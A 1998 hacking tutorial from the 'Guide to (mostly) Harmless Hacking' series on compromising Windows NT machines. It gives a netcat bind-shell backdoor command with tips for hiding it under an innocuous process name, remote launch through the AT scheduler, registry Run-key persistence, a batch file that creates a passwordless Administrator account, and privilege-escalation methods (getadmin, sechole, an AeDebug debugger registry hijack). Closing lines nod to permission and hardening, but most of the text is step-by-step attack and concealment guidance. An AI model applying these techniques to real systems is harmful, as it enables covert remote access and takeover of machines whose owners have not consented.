__________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 10 Part 2
How to Break into Windows NT: Backdoors
and Practical Jokes
____________________________________________________________
by keydet89@yahoo.com
[Backdoors and Practical Jokes]
Creating backdoors is how you can insure your ability to return
to the
system at will. This is almost a black art when dealing
with Un*x
systems, and it can also be done on NT.
netcat, from Weld Pond, takes advantage of any user's ability
to use
a local port. netcat is a command-line utility that has
several
switches used to configure it's operation. This makes netcat,
combined
with a properly configured command-line launched from a batch
file,
an excellent choice for a backdoor.
(get netcat for NT from http://www.l0pht.com/weld)
The batch file needs to contain:
nc -L -d -p [port] -t -e cmd.exe
L tells netcat to open keep listening after the
current
session terminates
d detach - don't open a DOS window when running (IMPORTANT)
p which port to bind to
t enable telnet negotiations
e command to execute upon connection
Copy this command line into a batch file named "runnc.bat"
or
something similar. Then copy both the netcat executeable
file and
the batch file to a directory that is in the PATH on the target
machine...c:\winnt\system32\ is a good place to hide them.
Another
little trick to keep in mind is to rename the netcat executable
from
'nc.exe' to something innocuous, like 'winlog.exe' (and make
sure to
make the appropriate changes to the batch file). That way,
when you
or your buddy opens the TaskList, there won't seem to be any
'unusual'
programs running. Run the batch file on your own machine,
and open
the TaskList (right-click on the TaskBar, and choose TaskList)...
Once this batch file is run, all you need to do is connect
via telnet,
or netcat in client mode:
c:\>nc -v [ipaddress of target] [port]
So how do you run this batch file? By default, NT doesn't
have an
interactive telnet server installed so that you can just log
in, so
what do you do? Well, there is a great little service called
the
Schedule (or 'AT') service, which lets you schedule programs
to be
run at a later date. To see if your Schedule service is
running,
you can either click Control Panel -> Services, and check
it, or
if you have Perl installed (see above), you can run the following
script to see if the service is running, and if not, start it:
----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# have successfully completed the IPC$ connection and have
# Administrator rights.
#
# usage: perl atchck.plx
use Win32::Service;
use Win32;
my %status;
Win32::Service::GetStatus('','Schedule', \%status);
die "service is arealdy started\n" if ($status{CurrentState}
== 4);
Win32::Service::StartService(Win32::NodeName( ),'Schedule')
|| die
"Can't start service\n";
print "Service started\n";
#**Note: This script was modified from:
#http://www.inforoute.cgs.fr/leberre1/perlser.htm
----- end script -----
Note: Only Administrators or members of the Administrators
group can
run the AT command.
Once installed, the 'runnc.bat' file can be executed via the
AT command.
The necessary syntax for the AT command is:
AT [\\computername] [time] "command"
or more particularly:
AT [\\computername] [time] runnc.bat
References to commands can be hidden in various places within
the
registry, set to run when a user logs in:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Note: This last key is where you will find things like
AOL's
Instant Messenger. The install puts the reference to the
app there,
but you won't find it in your StartUp box...
Here's another little exercise that you should run on your
own machine
first, and then try copying it over to a friend's machine and
running
it via the AT command. The batch file below uses commands
that are
native to NT to create a new user account, then make that user
a member
of the Administrator group:
----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----
What are some other neat little tricks to try? Get Netbus
from
http://netbus.hypermart.net/ . This little program is similar
to
Back Orifice, and it runs on NT. (Visit the makers of Back
Orifice
at http://www.cultdeadcow.com/)
Okay, so you and your 'leet buddies have played around with
each
other's machines via the Internet, and pretty much walked through
the
exercises listed above. Now, what are some local 'attacks'
that you
can run against your own machine?
[Local Attacks]
Let's say you have a couple of accounts on your NT box, at
least one
with Admin rights, and one or two others with user rights.
You've
already run through the password cracking exercise and seen how
easy
it is to get the 'SAM._' file and crack it. So what else
can you do?
Well, you try the 'getadmin' exploit. This exploit consists
of a
program and .dll file that will add the user to the Administrator
group.
Get the necessary files from:
http://www.nmrc.org/files/nt/index.html
The Microsoft site has a hotfix for the "getadmin"
exploit, located
at:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/
nt40/hotfixes-postSP3/getadmin-fix/
General information on security problems addressed by Microsoft
can be found at:
http://www.microsoft.com/security/issues.htm
For more information on the 'getadmin' exploit, go to:
http://www.ntsecurity.net
and search for 'getadmin'.
All you need to do to test this exploit is log onto your system
via
a user account, copy the files into a directory, and run getadmin.exe.
Another local exploit similar to the "getadmin"
exploit has popped up.
The exploit works like this: the user runs a program called
"sechole.exe" and the final result (possibly after
a reboot) is that
the user now has administrator rights! For more information
on this
and the zipped archive "sechole.zip", go to:
http://www.technotronic.com/microsoft.html
A variation on this exploit involves the Registry setting
the
determines what the default debugger (the program run when a
user mode
program crashes) is run.
Usually, the setting is:
Hive: HKEY_LOCAL_MACHINE
Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value: Debugger
Data Type: REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g
The "Everyone" group has the ability to set the
value of this key, and
is essential how you can exploit it. The debugger runs
in the security
context of the crashed application, so all you need to do is
change the
Default Value (via 'regedit') to point to the User Manager, and
then
crash one of the services that are running. Then you can
add accounts
to the User Manager...even to the Administrator group.
*******************************************************************
NEWBIE NOTE: Before any changes are made to the Registry,
make
sure that you make a backup of your current Registry using the
"rdisk /s" utility. You can make changes to the
Registry by clicking
Start -> Run, and entering either 'regedit' or 'regedt32'.
Before
you attempt any of this, read the files pertaining to the Registry
from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's
Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/)
and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
*******************************************************************
Another local exploit that you can attempt uses the NTFSDOS
utility,
which is nothing more than a bootable DOS diskette that can read
(but
not write to) NTFS partitions. This would potentially allow
an attacker
to make off with copies of systems files, to include the SAM
database.
The folks at Systems Internals (http://www.sysinternals.com)
have not
only an NTFSDOS utility available, but also some tools that give
the
user limited write capability. SysInternals also has NTRecover
and
NTLocksmith, along with a variety of other useful tools.
Get a copy of the utility, and try booting your own system
with the
diskette in the A:\ drive.
There is a nifty little utility available, one that is essentially
a
Linux boot disk:
http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
The utility comes with rawrite.exe, so that DOS and Windows
users can
download the utility and create the Linux boot disk.
The utility is a NTFS-bootable minimal kernel, with a small
program
that allows the user to change any password in the SAM database.
Alternatively, you can find the Linux binary file (without the
rawrite.exe utility) at:
http://www.nmrc.org/files/snt/index.html
called bootdisk.bin, and according to the description, this
is the
file you are interested in. You will still need to get
a copy of
rawrite.exe, in order to write the information to a diskette
in a
useable form.
Carefully read the instructions on the web page for the utility
(listed above) and if you are feeling especially '31337', try
it out
against your own system.
[Final Words]
By now you should be familiar with some of the methods used
to attack
and compromise an NT system. Hopefully, you have seen fit
to try out
the exercises on your own system, or against a friend's system
(with
permission, of course). And it should start becoming clear
what it
takes to secure a system from attack. The first step is
to become
familiar with various exploits by regularly visiting such sites
as
RootShell (http://www.rootshell.com), the ISS X-Force site
(http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net),
and NTBugTraq (http://www.ntbugtraq.com). Then go to the
Microsoft
Support (http://support.microsoft.com) and Security
(http://www.microsoft.com/security) sites to see what the 'official'
fixes are...the NTBugTraq site does a great job of keeping track
of
the latest hotfixes, and which ones are obsolete. The Microsoft
Support
site is especially useful, because you can search for information
or
specific KnowledgeBase articles, and print out those that you
find
useful. The "Hardening NT" document from Santeria
Systems
(http://pw2.netcom.com/~honeyluv/index.html) provides an excellent
guide for protecting your system, complete with references to
the
appropriate KnowledgeBase article for each step. Finally,
Microsoft
maintains a list of security bulletins at:
http://www.microsoft.com/security
_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests?
Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned
hacking of the
kind that led to the creation of the Internet and a new era of
freedom of
information. But we hate computer crime. So don't email
us about any crimes
you have committed!
© 1998 keydet89. You may forward, print out or
post this
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as
you leave this notice at the end.
_________________________________________________________
